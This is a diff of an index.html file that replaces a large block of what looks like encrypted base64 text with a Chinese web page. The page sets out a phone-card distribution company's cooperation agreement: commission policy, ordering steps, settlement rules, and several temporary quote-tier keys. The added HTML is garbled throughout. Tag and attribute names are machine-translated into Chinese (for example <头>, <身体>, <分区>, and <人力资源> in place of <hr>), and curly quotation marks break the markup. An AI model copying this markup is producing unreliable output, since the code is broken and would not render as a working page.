--- a/index.html
+++ b/index.html
@@ -1,199 +1,177 @@
-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
+@@ -1,176 +1,199@@
+<!DOCTYPE HTML PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
+<html xmlns=“http://www.w3.org/1999/xhtml">
+<头>
+ <meta http-equiv=“内容类型” content=“text/html; 字符集=utf-8" />
+ <元名称=“视口”内容=“宽度=设备宽度，初始比例=1">
+ <脚本异步 src=“js/busuanzi.pure.mini.js">
+ </脚本>
+ <title>河南享卡信息科技合作协议</title>
+ <!--波纹管样式 -->
+ <链接 rel=“样式表” href=“css/波纹管.css">
+ <链接 rel=“stylesheet” href=“css/bellows-theme.css">
+ <!--示例页面样式 -->
+ <链接 rel=“样式表” href=“css/lrtk.css">
+</头>
+<身体>
+<h1 style=“文本对齐：居中;”>河南享卡信息科技有限公司合作协议</h1>
+<div style=“文本对齐：center;">
+协议更新时间：2022.04.06 / 浏览量:
+ <span id=“busuanzi_value_page_pv”></span>
+</分区>
+<!-- ----------------------------------------------->
+<div class=“波纹管单">
+ <div 类=“bellows__item">
+  <div 类=“bellows__header">
+   <h3>1.关于产品</h3>
+  </分区>
+  <div 类=“bellows__content">
+   <b>公司所有产品以网站更新为准</b>
+   <人力资源>
+   <b>一.套餐大全展示页，无任何联系方式，不可下单，直接转发即可</b>
+   <br>
+   <a href=“http://ka.05321888.com/ka/taocan/index.html” target=“_blank”>点击查看</a >
+   <人力资源>
+   <b>二.河南享卡佣金补贴政策</b>
+   <br>本月我司将对于单量达标，当月激活200+且上架独家产品的分销商免费升级企业政策，有能力的享受合伙人政策。（警！自用卡且到佣金结算日，月订单数不足两单的不予结算佣金，累计两单后结算）
+7天内没出单、没招收代理、没有找公司说明情况、后台清退，防止恶意竞争和骗子！连续30天内不出单则自动清理资格！详情咨询渠道经理！对于长期且独家合作商，我司辅助在河南注册营业执照，享受补贴免税政策。
+   <人力资源>
+
+   <b> 三.经销商下级标准报价系统，绑定秘钥即可，禁止外传<br> <a href=“http://ka.05321888.com/ka/taocan/daili.html” target=“_blank”>点击查看</a>
+    <hr> 目前佣金远高于标准报价，后台佣金为准
+    <人力资源>
+    <br> 标准报价临时秘钥：ODY8QZCVSS<br> 我们还提供二级报价用于您的代理商<br> （1）在标准报价的基础上预留5元<br> 临时秘钥：RS47OFFCJR<br> （2）在标准报价的基础上预留10元<br> 临时秘钥：ZCM60CBPCE<br> （3）在标准报价的基础上预留15元<br> 临时秘钥：NLN74MGCNO<br> （4）在标准报价的基础上预留30元<br> 临时秘钥：KMG10XUGVO<br> </b>
+   <人力资源> 
+   <b>四.订单进度查询</b>
+   <br> （1）
+   <a href=“http://91haoka.cn/webapp/merchant/new_query.html?code=qspb%2B9044ss5E7y0lt3O3g%3D%3D” target=“_blank”>自助查询</a >
+   <br> （2）支撑群内提供订单信息联系客服查询
+   <人力资源>
+   <b>五.禁发区/首充方式/快递方式/合约期等查询</b>
+   <br> （1）
+   <a href=“http://tcdq.05321888.com/page/taocan/xgzl.html” target=“_blank”>自助查询</a >
+   <br> （2）支撑群内提供订单信息联系客服查询
+   <人力资源>
+  </分区>
+ </分区>
+ <!-- ----------------------------------------------->
+ <div class=“波纹管单">
+  <div 类=“bellows__item">
+   <div 类=“bellows__header">
+    <h3>2.下单流程</h3>
+   </分区>
+   <div 类=“bellows__content">
+    <b>根据不同场景，我们提供了下单方式</b>
+    <人力资源>
+    <b>敢探号分销系统（自助下单）（仅限无卡费产品）</b>
+    <br> （1）如果您已有敢探号分销系统，通过供应商代码对接即可 VqVhqVYvg4
+    <br> （2）如果您没有感叹号分销系统，
+    <a href=“http://www.91haoka.cn/gth/#/register?supplier_id=VqVhqVYvg4” target=“_blank”>点我注册</a>，自助注册即可
+    <br> （3）如您使用分销系统，请将账户名报备给业务经理或客服登记，财务结算以此为依据！
+    <br> （4）后续复制下单链接发给客户下单即可。
+   </分区>
+  </分区>
+  <!-- ----------------------------------------------->
+  <div class=“波纹管单">
+   <div 类=“bellows__item">
+    <div 类=“bellows__header">
+     <h3>3.佣金结算</h3>
+    </分区>
+    <div 类=“bellows__content">
+     <b>1.所有佣金均为次月在网月底按佣金顺序由大到小来结算，延迟不超过5天</b>
+     <人力资源>
+     <b>2.结算方式</b>
+     <br>为我司财务在次月初将订单汇总页发送到您的支撑群里,佣金核对将实时进行，实时查看,在月底前,财务将已核对的佣金,进行打款,小额采用微信/支付宝/银行卡，大额采用公司对公户打款
+     <人力资源>
+     <b>3.常见未结算订单原因</b>
+     <br> （1）欠费，有异议提供下单信息报财务核查
+     <br> （2）未激活，有异议提供下单信息报财务核查
+     <br> （3）违章停机，有异议提供下单信息报财务核查
+     <br> （4）机主姓名和下单信息不一致，有异议提供下单信息报财务核查
+     <br> （5）月底26-31号的订单，运营商审核+发货，基本都是次月签收，需延后一个月结算
